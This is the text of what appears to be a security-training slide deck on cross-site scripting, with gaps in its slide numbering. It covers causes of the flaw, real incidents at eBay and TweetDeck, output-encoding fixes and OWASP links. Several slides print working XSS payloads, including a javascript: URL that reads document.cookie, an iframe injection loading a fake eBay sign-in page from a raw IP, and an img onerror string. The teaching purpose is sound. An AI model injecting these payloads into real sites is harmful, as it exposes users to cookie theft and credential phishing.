The document discusses cross-site scripting (XSS) flaws that occur when untrusted user data is included on a webpage without validation or encoding. XSS allows attackers to execute scripts in a victim's browser by tricking them into visiting a malicious website. The document provides examples of XSS payloads and links to learn more about prevention and filters.

1. Alert(‘xss’)

2. OWASP
owasp.org

4. XSS flaws occur when an application includes user supplied
data in a page sent to the browser without properly validating
or escaping that content.

7. Caused by an application that:
● Fails to properly validate untrusted
data.
● Fails to properly encode output data.

8. Generally an
attack against
an application’s
users, not an
application.

10. Source: http://excess-xss.com/

11. Source: http://excess-xss.com/

12. Source: http://excess-xss.com/

13. Source: http://excess-xss.com/

14. Source: http://excess-xss.com/

18. http://ebay.com/link/?
nav=webview&url=javascript:
alert(document.cookie)
Note: XSS doesn’t always need a <script> tag to execute.

19. Bonus Points: What is missing on eBay’s cookies?

21. document.write(‘<iframe src=”
http://45.55.162.179/ebay/signin.
ebay.com/ws/eBayISAPI9f90.
html&#8221; width=”1500″
height=”1000″>’)

24. Set to automatically retweet via this: data-action:retweet causing a
chain event for anyone that logs into TweetDeck.

26. https://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html

29. https://xss-doc.appspot.
com/demo/3#'><img src=x
onerror=alert(/DOM-XSS/)>
https://xss-doc.appspot.com/demo/3#'><img src=x
onerror=alert(/DOM-XSS/)>
https://www.google.com/about/appsecurity/learning/xss/

46. http://gauntlt.org/

48. https://github.com/gauntlt

50. DevOps
with
Pipeline

59. ○
○
<%= h foo.bar %>
Server.HtmlEncode(string)
● https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
● https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet